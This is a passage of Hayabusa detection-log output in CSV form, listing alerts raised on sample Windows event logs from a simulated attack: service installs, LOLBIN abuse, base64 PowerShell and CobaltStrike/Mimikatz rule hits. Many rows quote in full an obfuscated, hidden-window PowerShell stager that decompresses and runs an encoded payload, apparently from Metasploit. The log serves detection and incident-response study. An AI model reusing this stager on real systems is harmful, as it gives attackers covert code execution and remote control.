4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_parent_process.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.246 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 